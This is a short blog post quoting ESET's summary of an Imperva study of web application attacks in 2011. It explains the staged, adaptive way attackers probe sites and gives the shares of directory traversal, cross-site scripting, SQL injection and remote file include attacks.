ESET offers an excellent analysis of how websites are attacked by hackers.
WebSite Security – Approaches used by hackers
QUOTE: Well, really there are far more, but the latest study from Imperva of 10 million attacks against 30 large organizations from January to May of 2011 cites a cocktail of techniques used by would-be hackers to spot the weaknesses and exploit them. For those of us who’ve tailed a log file spinning out of control during an attack attempt, those numbers seem plausible. Over time, attacks have become slick and automated, often progressive, and adaptive, targeting the next phase based on what was found in the last.
To understand a typical hack attempt, visualize a typical commercial office space break-in. There may first be a surveillance phase. Following that is a second phase that determines which doors are locked. Then, if an unlocked door is found near a machine shop, you may adapt your attack to include a truck to haul heavy equipment out during the theft. On the other hand, if you find a door open by an accounting office, you may adapt your attack to use a single backpack to steal an equivalent value. Attacks of the variety we’re talking about here follow progressive stages of discovery, adapting as they go to the “terrain” they find in a similar manner, and using different sets of tools for each.
Some of the more popular styles found in Imperva’s study against Web applications were directory traversal (37%), cross site scripting (36%), SQL injection (23%), and remote file include (4%), aka RFI. Often these were used in combination.